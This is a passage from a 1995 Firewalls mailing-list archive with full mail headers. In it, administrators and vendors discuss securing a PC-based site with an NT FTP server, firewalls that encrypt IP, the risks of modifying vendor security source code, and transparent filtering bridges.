secure? Is it reliable? Is it considered A Good Thing to have hundreds of logins on your ftp server, but no anonymous access? What about the WWW server? What steps should be taken to secure this network? Any and all suggestions welcome. Please mail responses to me (at pandreas@eiknes.se). I will summarize for the list if desired. Thanks, Patrik From firewalls-owner Tue May 2 07:39:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA07089 for firewalls-outgoing; Tue, 2 May 1995 06:24:25 -0700 Received: from relay.tis.com (relay.tis.com [192.94.214.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA07079 for ; Tue, 2 May 1995 06:24:20 -0700 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma017497; Tue, 2 May 95 09:22:41 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA20985; Tue, 2 May 95 09:23:13 EDT Message-Id: <9505021323.AA20985@tis.com> From: Frederick M Avolio X-Organization: Trusted Information Systems, Inc. X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363 To: Scott Surguine Cc: Firewalls@greatcircle.com Subject: Re: TIS and other "Off The Shelf Packages" In-Reply-To: Your message of Mon, 01 May 95 16:15:30 -0600. <199505012215.AA19834@teal.csn.org> Date: Tue, 02 May 95 09:23:12 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you want info re: TIS's firewall product, send mail to gauntlet-info@tis.com. F From firewalls-owner Tue May 2 08:02:45 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA07143 for firewalls-outgoing; Tue, 2 May 1995 06:25:47 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA07132 for ; Tue, 2 May 1995 06:25:40 -0700 Received: from ns.noaa.gov by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id GAA05313; Tue, 2 May 1995 06:24:48 -0700 Received: from smtpgate.ssmc.noaa.gov (SMTPGATE.SSMC.NOAA.GOV [140.90.9.50]) by ns.noaa.gov (8.6.9/8.6.9) with SMTP id JAA00787; Tue, 2 May 1995 09:22:13 -0400 Received: from cc:Mail SMTPLINK 2.1 by smtpgate.ssmc.noaa.gov id AA799431761; Tue, 02 May 95 08:10:42 EST Date: Tue, 02 May 95 08:10:42 EST From: "Patrick Stingley" Message-Id: <9504027994.AA799431761@smtpgate.ssmc.noaa.gov> To: Firewalls@GreatCircle.COM, firewalls-digest@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #279 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear Fellow Firewallers, Does anybody know of a firewall other than TIS's Gauntlet or Raptor's Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP packet is encrypted and a destination IP address preprended for another firewall across the Internet. Once received at the destination firewall, the encrypted packet is decrypted and sent to the appropraite host) I am not asking this due to problems with TIS or Raptor, but as a result of trying to complete some research into this area. Thanks in advance, Patrick T. Stingley (301) 713-0882 x104 stingley@apwk01g1.nws.noaa.gov From firewalls-owner Tue May 2 08:31:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA07142 for firewalls-outgoing; Tue, 2 May 1995 06:25:46 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA07134 for ; Tue, 2 May 1995 06:25:41 -0700 Received: from ns.noaa.gov by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id GAA05313; Tue, 2 May 1995 06:24:48 -0700 Received: from smtpgate.ssmc.noaa.gov (SMTPGATE.SSMC.NOAA.GOV [140.90.9.50]) by ns.noaa.gov (8.6.9/8.6.9) with SMTP id JAA00787; Tue, 2 May 1995 09:22:13 -0400 Received: from cc:Mail SMTPLINK 2.1 by smtpgate.ssmc.noaa.gov id AA799431761; Tue, 02 May 95 08:10:42 EST Date: Tue, 02 May 95 08:10:42 EST From: "Patrick Stingley" Message-Id: <9504027994.AA799431761@smtpgate.ssmc.noaa.gov> To: Firewalls@GreatCircle.COM, firewalls-digest@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #279 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear Fellow Firewallers, Does anybody know of a firewall other than TIS's Gauntlet or Raptor's Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP packet is encrypted and a destination IP address preprended for another firewall across the Internet. Once received at the destination firewall, the encrypted packet is decrypted and sent to the appropraite host) I am not asking this due to problems with TIS or Raptor, but as a result of trying to complete some research into this area. Thanks in advance, Patrick T. Stingley (301) 713-0882 x104 stingley@apwk01g1.nws.noaa.gov From firewalls-owner Tue May 2 08:51:17 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA07990 for firewalls-outgoing; Tue, 2 May 1995 06:47:21 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA07979 for ; Tue, 2 May 1995 06:47:08 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA14691; Tue, 2 May 95 09:45:48 EDT Date: Tue, 2 May 1995 09:45:48 -0400 (EDT) From: Scott Barman To: Frank Byrum Cc: firewalls@greatcircle.com Subject: Re: Source Code In-Reply-To: <9505011350.AA02028@vbv03.vbv.dec.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 May 1995, Frank Byrum wrote: > > I find the fact that people want to modify source code interesting. I Why? > might be able to forgive changing code for logging or adding additional > logging, but the fact does remain that this code is used to secure a > site. And even if you read the code and think that you understand the > code and have considered the codes interaction with other subsystem--you > could still introduce a new bug. (This is not saying that the code > writes might not do the same--but they are responsible for their work). That's true of any software system, not just security software. > But this does propose a problem, what if the designers redesign the > security code, what do you do then? See if the new code incorporates your fix--at least in functionality. If it does, then don't worry about it and install the new version. If not, find the problem and hack in a new change. > Who is responsible if your change > causes a security problem? Whomever made the change is responsible. > Or better yet, what if your changes have some > ripple effect to some other subsystem and an issue that was not a > problem before now becomes a security hole. Trying to support changes like So you undo the change and go back to the drawing board. Sounds like a typical day on the job! :-) > this can become a real problem. I have seen many people who try to modify > code of this nature and make a real mess of things. Mostly because their > understanding was not complete. That's their fault. I always try to study what I am about to change and make sure that there will be no problems. Then before I install the change, I test it first. After I test, I always go to someone else and ask them to break the change. So far (knock wood) I have not had any major problems. > Even though we include source code with our distribution, I would not suggest > that anyone make changes. It gets real hard to try to support a product > and changes as well. I can not guarantee that any changes that are > made will work in the next version. And we really don't have the time > to debug people's code. If there are changes needed, I would rather > have that information placed in the engineering process so we can > include the functionality in the next release. That way there is true > support for the change and if there are problems we can deal with them. Why should you support local changes. I do not know of a single vendor who does? As part of your source distribution, you tell the customer that if they make changes, they do so at their own risk--and you put it in writing! As a consultant, I write software. If I give a customer the software and tell him I will support it for a certain period of time (contractually). If something happens and the customer makes his own changes, I will not support the changes--my contracts usually say this, too. I've had two customers that did this. One paid me for fixing the fix (and apologized for not calling me sooner) and the other sued me. I won! I do work for you, you change my work, it's no longer my responsibilty. It's just that simple! scott barman scott@disclsoure.com (I speak for myself... sometimes badly! :-) From firewalls-owner Tue May 2 09:39:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08648 for firewalls-outgoing; Tue, 2 May 1995 07:19:33 -0700 Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA08642 for ; Tue, 2 May 1995 07:19:30 -0700 Received: by wabash.iac.net id KAA08421; Tue, 2 May 1995 10:17:13 -0400 Date: Tue, 2 May 1995 10:17:08 -0400 (EDT) From: Carl Jolley To: Robert Moskowitz cc: "Bryan D. Boyle" , firewalls@GreatCircle.COM Subject: Re: Re:TRUST US In-Reply-To: <9505021153.AA18907@clncrdv1.is.chrysler.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, I know. One particularily notable law is called the Foreign Corrupt Practices Act. I know it applies to officers of US public companies. I don't know if it applies directly to employees. **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** On Tue, 2 May 1995, Robert Moskowitz wrote: > At 09:31 AM 4/28/95 -0400, Carl Jolley wrote: > > > >I once asked the Technical Support Manager of a data center what his > >disaster recovery plan for his data center was and he told me that his > >disaster recover plan was: if a disaster occurred, he would turn in his > >resignation. His logic was that the risk of getting hit by a disaster > >was low but the probability of him having to do a lot of work to develop > >the plan was high, so.... > > In today's DP world, he could be criminally cuppable for his former > employee's business failure. Think about that one... > > Robert Moskowitz > Chrysler Corporation > (810) 758-8212 > > From firewalls-owner Tue May 2 09:39:45 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08614 for firewalls-outgoing; Tue, 2 May 1995 07:16:52 -0700 Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.6.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA08609 for ; Tue, 2 May 1995 07:16:48 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id JAA02288 for GreatCircle.COM!firewalls; Tue, 2 May 1995 09:13:27 -0500 Received: by ris1.nmti.com (smail2.5) id AA20810; 2 May 95 07:29:53 CDT (Tue) Received: by sonic.nmti.com; id AA16070; Tue, 2 May 1995 07:50:16 -0500 Message-Id: <9505021250.AA16070@sonic.nmti.com.nmti.com> To: Rick Smith Cc: firewalls@GreatCircle.COM Subject: Re: TRUST US and other hooui In-Reply-To: Your message of "Mon, 01 May 95 17:29:21 CDT." <199505012229.RAA19042@shade.sctc.com> X-Mailer: exmh version 1.4.1 7/21/94 Date: Tue, 02 May 95 07:50:15 -0500 From: peter@nmti.com X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I think the problem with software is that the side effects of changes > are much, much harder to predict and control. People can install > aftermarket stereos because cars and stereos have reached a level of > technological maturity in which *most* of the problems have been > anticipated and designed out of this scenario. A properly installed > stereo isn't going to blow the fuses or drain the battery. Neither will a properly installed compatible patch. In fact, I had a stereo that was incompatible with my car... when it was operating my turn signals didn't work. It was installed by the dealer according to instructions, but caused too much drain on some circuit. I had to replace it. And this wasn't a particularly fancy stereo, either. > Also, the > most likely failure modes decrease your enjoyment of your car but are > unlikely to risk your life and safety. You mean like non-working turn signals? > On the other hand, there is No Way to anticipate the side effects of > arbitrary changes to source code, especially in security software. No more than it's possible to anticipate the side effects of arbitrary changes to automobiles. -- Peter da Silva `-_-' Network Management Technology Incorporated 'U` 1601 Industrial Blvd. Sugar Land, TX 77478 USA +1 713 274 5180 "Har du kramat din varg idag?" From firewalls-owner Tue May 2 09:59:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08531 for firewalls-outgoing; Tue, 2 May 1995 07:13:46 -0700 Received: from oxygen.house.gov (oxygen.house.gov [137.18.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA08524 for ; Tue, 2 May 1995 07:13:42 -0700 Received: by oxygen.house.gov (AIX 3.2/UCB 5.64/3.2.083191-) id AA15603; Tue, 2 May 1995 10:13:14 -0400 Date: Tue, 2 May 1995 10:13:14 -0400 From: johns@oxygen.house.gov (John Schnizlein) Message-Id: <9505021413.AA15603@oxygen.house.gov> To: firewalls@greatcircle.com, greulich@math-stat.unibe.ch Subject: Re: completely transparent filtering device? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk question extract: > What I look for is a device that actually has none of its two ip interfaces > configured to an ip address or subnet or anything like this; this device > would just receive ethernet frames from one side, send it thru some > filtering mechanism, and based upon a yes-no decision sends it unchanged > to the other interface, and vice versa. This way it would be completely > invisible. It would also (assuming the filtering rules allow that) let > ARP/RARP packets and the like pass unchanged. One possiblility is to partition the subnet you have into two parts and separate them with a router that performs proxy-arp. You could then use packet filtering in this router. Without knowing details like how many hosts per subnet you use, it is not clear that avoiding ip addresses on the router ports is essential. Subnet masks are not sacrosanct. Playing with different masks on routers connected to a common link (eg ethernet) is great fun. With practice, you get to appreciate various patterns in binary numbers, expressed in dotted decimal. (This looks like magic to the uninitiated :-) Connecting routers under different people's control is the tradition of the Internet. Good router screens make good neighbors. If the same brand of router is used as in the organization backbone, you will be able to understand the fine points and be able to help them. Someone will, no doubt, recommend the KarlBridge; I don't know how easy it is to filter based on higher-layer protocol fields of the packets with this. The ease of different products will depend on just what screening policy you need. You (perhaps wisely) did not specify those. Of course, reasonable host security and internal monitoring for well-known weaknesses should be used in conjunction with any router screen. From firewalls-owner Tue May 2 09:59:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08843 for firewalls-outgoing; Tue, 2 May 1995 07:30:14 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA08838 for ; Tue, 2 May 1995 07:30:12 -0700 Received: from gateway.sctc.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id HAA05429; Tue, 2 May 1995 07:29:17 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id JAA17885 for ; Tue, 2 May 1995 09:29:47 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 246770000; 2 May 95 10:28 CDT Received: from sctc.com by sccmailhost.sctc.com id 220730000; 2 May 95 10:28 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id JAA11441; Tue, 2 May 1995 09:28:11 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id JAA00635; Tue, 2 May 1995 09:28:10 -0500 Date: Tue, 2 May 1995 09:28:10 -0500 From: Rick Smith Message-Id: <199505021428.JAA00635@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: some remarks on the source and what it buys you - Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Christopher Smith asks about SDIO's trusted software development methodology: >Does this mean that for these guys, everything had to be assured? In the worst case, yes. And I mean *everything*. In practice, application of SDIO to typical computer security software hasn't been as extreme. Security requirements took more of an Orange Book interpretation and tried to omit the requirements for highly assured (nonexistent) compilers and OSes. I assume the rich set of unachievable requirements has led to the current disillusionment with the SDIO methodology. >Instead >of falling back on a simplistic well-defined layer, they used the brute >force approach? The Orange Book actually requires a modular architecture while the SDIO methodology says nothing specific about it. But we've found in practice that you can only do formal assurance of a system that you can cleanly decompose into arguably independent components. So formal assurance requirements in SDIO effectively force you towards simplicity. >How was sidewinder structured? We started with BSDI Unix and put type enforcement inside the kernel. This lets us focus on security at the kernel level, instead of having to deal piecmeal with a constantly expanding and changing set of application protocol implementations. The resulting kernel is BSDI software compatible. The design is in no way as simple as the design of our highly assured, A1 style TCB. Security is always a tradeoff between mission requirements, threats, and countermeasures. Formal assurance is a countermeasure against security relevant design flaws. Formally assured TCBs are expensive and generally provide fewer features and capabilities. Few commercial customers are paranoid enough (yet) to pay that kind of money for a firewall, or to accept the smaller set of services provided. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Tue May 2 10:17:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10304 for firewalls-outgoing; Tue, 2 May 1995 08:45:25 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA10299 for ; Tue, 2 May 1995 08:45:18 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id KAA18720; Tue, 2 May 1995 10:46:29 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 252920000; 2 May 95 11:45 CDT Received: from sctc.com by sccmailhost.sctc.com id 225110000; 2 May 95 11:44 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id KAA14413; Tue, 2 May 1995 10:44:36 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id KAA03682; Tue, 2 May 1995 10:44:34 -0500 From: Rick Smith Message-Id: <199505021544.KAA03682@shade.sctc.com> Subject: Re: TRUST US and other hooui To: peter@nmti.com Date: Tue, 2 May 1995 10:44:34 -0500 (CDT) Cc: smith@sctc.com, firewalls@GreatCircle.COM In-Reply-To: <9505021250.AA16070@sonic.nmti.com.nmti.com> from "peter@nmti.com" at May 2, 95 07:50:15 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1329 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I wrote: > > I think the problem with software is that the side effects of changes > > are much, much harder to predict and control... A properly installed > > stereo isn't going to blow the fuses or drain the battery. Peter da Silva replied: > Neither will a properly installed compatible patch. The point is that it's much easier to evaluate the correctness of a stereo installation in a car than it is to evaluate whether a patch is "properly installed" and "compatible." I don't have any figures on the failure rate for stereo installations, but they can't possibly be as risky as software patching. > > Also, the > > most likely failure modes decrease your enjoyment of your car but are > > unlikely to risk your life and safety. > > You mean like non-working turn signals? In a car, the problem was limited to the electrical system handling low wattage devices. It didn't affect the ignition and thus affect the car's mission critical behavior. Changes to security software are rarely as well constrained. Software patches can yield race conditions or infinite loops that shut down service entirely, or could modify data passing through the security software. These flaws directly affect the system's overall mission and aren't always obvious from the source code. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Tue May 2 10:45:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA09761 for firewalls-outgoing; Tue, 2 May 1995 08:16:50 -0700 Received: from inet-gw-2.pa.dec.com (inet-gw-2.pa.dec.com [16.1.0.23]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA09756 for ; Tue, 2 May 1995 08:16:47 -0700 Received: from vbv03.vbv.dec.com by inet-gw-2.pa.dec.com (5.65/24Feb95) id AA15951; Tue, 2 May 95 08:10:04 -0700 Received: by vbv03.vbv.dec.com (5.65/MS-012594); id AA04553; Tue, 2 May 1995 11:10:01 -0400 Message-Id: <9505021510.AA04553@vbv03.vbv.dec.com> To: scott@disclosure.com Cc: Frank Byrum , firewalls@greatcircle.com Subject: Re: Source Code In-Reply-To: Your message of "Tue, 02 May 95 09:47:35 EDT." Date: Tue, 02 May 95 11:10:01 -0400 From: "Frank Byrum" X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 May 1995, Scott Barman replies: >On Mon, 1 May 1995, Frank Byrum wrote: >> >> I find the fact that people want to modify source code interesting. I > >Why? The code is really for reference. It is not intended for modification. Security code has alot of potential dependencies, which may have a great impact on the overall security of an organization. I would like to think that we work with our customers in such a way the modificaiton of the source code is not necessary. But I can not state to this group that changing source code is the best idea. Although I understand why people do make changes. I have seem people modify source code and miss reading the manual, which explained exactly what they need to do. >> might be able to forgive changing code for logging or adding additional >> logging, but the fact does remain that this code is used to secure a >> site. And even if you read the code and think that you understand the >> code and have considered the codes interaction with other subsystem--you >> could still introduce a new bug. (This is not saying that the code >> writes might not do the same--but they are responsible for their work). > >That's true of any software system, not just security software. Agreed. >> But this does propose a problem, what if the designers redesign the >> security code, what do you do then? > >See if the new code incorporates your fix--at least in functionality. >If it does, then don't worry about it and install the new version. If >not, find the problem and hack in a new change. This becomes more difficult as software matures. And I seem to have less and less time to keep up with changes to code that I made in the past. Although I have done this my self, I think that it is bad pratice to keep dumping my modifications into new software all the time. This is bad software engineering, I would rather give the changes to the folks that maintain the software, in hopes that they will would be included in the next version. > >> Who is responsible if your change >> causes a security problem? > >Whomever made the change is responsible. I would like to think this is true. > >> Or better yet, what if your changes have some >> ripple effect to some other subsystem and an issue that was not a >> problem before now becomes a security hole. Trying to support changes like > >So you undo the change and go back to the drawing board. Sounds like >a typical day on the job! :-) Very typical. >> this can become a real problem. I have seen many people who try to modify >> code of this nature and make a real mess of things. Mostly because their >> understanding was not complete. > >That's their fault. I always try to study what I am about to change and >make sure that there will be no problems. Then before I install the >change, I test it first. After I test, I always go to someone else and >ask them to break the change. So far (knock wood) I have not had any >major problems. Agreed! But many people that I have seen do these modifications are not that careful. And their knowledge is not extensive enough to make the necessary changes correctly. >> Even though we include source code with our distribution, I would not suggest >> that anyone make changes. It gets real hard to try to support a product >> and changes as well. I can not guarantee that any changes that are >> made will work in the next version. And we really don't have the time >> to debug people's code. If there are changes needed, I would rather >> have that information placed in the engineering process so we can >> include the functionality in the next release. That way there is true >> support for the change and if there are problems we can deal with them. >Why should you support local changes. I do not know of a single vendor >who does? As part of your source distribution, you tell the customer >that if they make changes, they do so at their own risk--and you put it >in writing! Agreed! But this does not keep customers from asking or even pointing to a problem that they have induced as one of ours. >As a consultant, I write software. If I give a customer the software >and tell him I will support it for a certain period of time >(contractually). If something happens and the customer makes his own >changes, I will not support the changes--my contracts usually say >this, too. I've had two customers that did this. One paid me for >fixing the fix (and apologized for not calling me sooner) and the >other sued me. I won! >I do work for you, you change my work, it's no longer my responsibilty. >It's just that simple! Oh to wish that it was as that simple! >scott barman >scott@disclsoure.com >(I speak for myself... sometimes badly! :-) It would seem that you have great experience in this type of work. In general, many of us on this list have modified (and sometimes hacked) software to do exactly what we would like. And I think that most of us have taken responsibility for the software we write and/or modify. I wish that this was universally true, but it is not. I can not tell you the number of times that I have spent looking for a bug in a large system, only to find that the customer made one minor change (that of course would not effect the system, so why even mention it) that took a while to find. I do feel responsible for the code that I write. I also feel responsible for the over all system that we deliver. Daily, I spend time with customers trying to understand what they like/dislike and need. This information goes back into the engineering process in hopes of developing a better product. Not everyone can, will, or should modify software. For those who can-- enjoy, for those who can not or would like us to hold the responsibility-- keep those ideas and suggestions coming. Thanks for your response! Frank From firewalls-owner Tue May 2 11:13:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12513 for firewalls-outgoing; Tue, 2 May 1995 10:17:47 -0700 Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12506 for ; Tue, 2 May 1995 10:17:40 -0700 Received: by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.12) via UUCP id AA07190 ; Tue, 2 May 95 13:17:59 -0400 Received: from sb.lanier.com (sb.lanier.com [130.205.128.33]) by sd.lanier.com (8.6.8.1/8.6.6) with ESMTP id NAA18097; Tue, 2 May 1995 13:17:19 -0400 Received: (from bisley@localhost) by sb.lanier.com (8.6.8.1/8.6.6) id NAA03400; Tue, 2 May 1995 13:20:12 -0400 From: Brad Isley Message-Id: <199505021720.NAA03400@sb.lanier.com> Subject: Re: TRUST US and other hooui To: peter@nmti.com Date: Tue, 2 May 1995 13:20:12 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9505021250.AA16070@sonic.nmti.com.nmti.com> from "peter@nmti.com" at May 2, 95 07:50:15 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1481 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > I think the problem with software is that the side effects of changes > > are much, much harder to predict and control. People can install > > aftermarket stereos because cars and stereos have reached a level of > > technological maturity in which *most* of the problems have been > > anticipated and designed out of this scenario. A properly installed > > stereo isn't going to blow the fuses or drain the battery. > > Neither will a properly installed compatible patch. Which is magnitudes more difficult to produce than a stereo unit using VERY SIMPLE line in / line out signal levels and 12.8 volt power. > In fact, I had a stereo that was incompatible with my car... when it was > operating my turn signals didn't work. It was installed by the dealer > according to instructions, but caused too much drain on some circuit. I > had to replace it. And this wasn't a particularly fancy stereo, either. So the circuit you plugged it into was too weak! This is difficult? Excuse me? You had to REPLACE A STEREO because you couldn't find an alternative power source? And you think this is comparable to patching a bug in a complex software product? Come on, Peter. You should know better. > -- > Peter da Silva `-_-' > Network Management Technology Incorporated 'U` > 1601 Industrial Blvd. Sugar Land, TX 77478 USA > +1 713 274 5180 "Har du kramat din varg idag?" > From firewalls-owner Tue May 2 11:23:17 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10533 for firewalls-outgoing; Tue, 2 May 1995 08:56:47 -0700 Received: from summit.novell.com (usl.summit.novell.com [147.2.200.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA10528 for ; Tue, 2 May 1995 08:56:44 -0700 From: cjc@summit.novell.com To: firewalls@GreatCircle.COM, pandreas@eiknes.se (Patrik Andreasen) Date: Tue, 2 May 1995 11:33 EDT Subject: Re: Securing PC based site Content-Length: 3231 Content-Type: text/plain Message-ID: <2fa655870.2773@chimaera.summit.novell.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: PANDREAS@eiknes.se (Patrik Andreasen) > To: Firewalls@greatcircle.com > Subject: Securing PC based site > Content-Length: 1541 > Content-Type: text/plain > Sender: firewalls-owner@GreatCircle.COM > Precedence: bulk > Status: R > > Securing PC based site > > I'm in the process of evaluating the security of, and proposing changes to, > the protective measures at a mainly PC-based network company that is > inexperienced with dealing with the Internet. Most of the users are > on Novell NetWare-connected PCs, with the network connected to the internet. > However, there are a few hosts on the net that offer services to the > outside world. These include: > > a Windows NT ftp server with logins for an (relatively large) number > of paying subscribers the same NT box also runs a WWW server > > a PC runnig a SMTP <-> GroupWise mail gateway > > a UnixWare host running DNS and telnet > > First, I would suppose that putting IP on the PCs wouldnt in it self be > a significant security risk, since they would be used solely as clients to > various WWW servers around the net. The use of any server-software on a > PC would not be supported in the security policy. > > Second, the mail gateway seems to be pretty safe, since it runs DOS and > can only talk to the GroupWise post office. Still, the usual troubles > with mailbombs and suchlike is still a threat. > > NT box is a big questionmark. Does anyone have experience with NT as a > 3W and FTP server? Is it secure? Is it reliable? Is it considered A > Good Thing to have hundreds of logins on your ftp server, > but no anonymous access? > What about the WWW server? > > What steps should be taken to secure this network? Any and all > suggestions welcome. > > Please mail responses to me (at pandreas@eiknes.se). > I will summarize for the list if desired. > > Thanks, > > Patrik I've answered posts like this on this list (and others), so I thought I'd CC my answer to the list this time. - It's true that PC clients that are visible to the world don't currently constitute a security problem, but this _will_ change in the near future given that Windows95 will support file and print sharing over IP right out of the box. - Similarly, NetWare doesn't support IP out of the box _yet_, but it is an option and it will be in the base product soon. - Don't rely on your security policy to keep users from installing software that will compromise your site. They may install software they don't even _know_ is a security risk. - I don't see any problems with having a WNT box with lots of authenticated ftp accounts, but no anon ftp; however, any machines directly connected to the net (the WNT box, the UnixWare box) _will_ get attacked (it's just a question of when), so you shouldn't trust any data stored there, etc. Also, all systems have ways of attacking them you haven't thought about (password sniffing rsh/rlogin/etc, NFS, attacks on DNS and routing protocols, mailer bugs, IP spoofing, etc). - Sounds like you need a firewall. -- Christopher J. Calabrese Network Security Architect Novell Information Services & Technology, Summit, NJ cjc@summit.novell.com From firewalls-owner Tue May 2 11:47:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10793 for firewalls-outgoing; Tue, 2 May 1995 09:07:25 -0700 Received: from interport.net (interport.net [199.184.165.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10788 for ; Tue, 2 May 1995 09:07:17 -0700 Received: (from mccomb@localhost) by interport.net (8.6.10/8.6.10) id MAA22228; Tue, 2 May 1995 12:03:12 -0400 Date: Tue, 2 May 1995 12:03:10 -0400 (EDT) From: DaVe To: firewalls@greatcircle.com Subject: libc for DNS without NIS ? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Could someone please send me instructions on creating a "libc" under SunOS 4.1.3 that uses DNS instead of NIS. I've seen it posted in the past, but can't seem to find it now. I think the original document was called "Making a libc.so for DNS without NIS." Thanks. -DaVe mccomb@interport.net URL: http://www.interport.net/~mccomb/ From firewalls-owner Tue May 2 12:11:05 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13655 for firewalls-outgoing; Tue, 2 May 1995 10:51:31 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA13648 for ; Tue, 2 May 1995 10:51:29 -0700 Received: from relay3.UU.NET by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id KAA06014; Tue, 2 May 1995 10:50:30 -0700 Received: from uucp3.UU.NET by relay3.UU.NET with SMTP id QQynzz17635; Tue, 2 May 1995 13:49:59 -0400 Received: from almserv.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Tue, 2 May 1995 13:49:54 -0400 Received: from pacific.fnma.com by fnma.COM (4.1/SMI-4.1) id AA04156; Tue, 2 May 95 12:19:54 EDT Received: by pacific.fnma.com (4.1/SMI-4.1) id AA10068; Tue, 2 May 95 12:19:50 EDT Date: Tue, 2 May 95 12:19:50 EDT From: s0ujgg@pacific.fnma.COM (Joseph Gerrity) Message-Id: <9505021619.AA10068@pacific.fnma.com> To: firewalls@greatcircle.com Subject: Policies Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our organization is in need of a 